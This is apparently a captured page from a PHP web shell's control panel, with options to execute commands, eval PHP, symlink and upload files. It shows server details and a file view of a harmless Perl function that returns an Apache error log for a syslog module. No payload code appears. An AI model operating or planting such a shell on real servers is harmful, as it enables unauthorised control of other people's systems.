Home Files
Adminer
Execute Command
PHP Eval
Symlink
File Upload
Owner :
www-data
PHP Version
5.6.40-0+deb8u12
Disk Space
40.81 GB
Server Addr
19-www4
Your IP
10.10.10.40
Edit File
File:
# Contains a function to supply the syslog module with extra logs do 'apache-lib.pl'; # syslog_getlogs() # Returns the main error log, if it exists sub syslog_getlogs { local $conf = &get_config(); local $errlog = &find_directive("ErrorLog", $conf, 1); local @rv; if ($errlog && $errlog !~ /^\|/) { push(@rv, { 'file' => &server_root($errlog), 'desc' => $text{'syslog_desc'}, 'active' => 1 }); } return @rv; }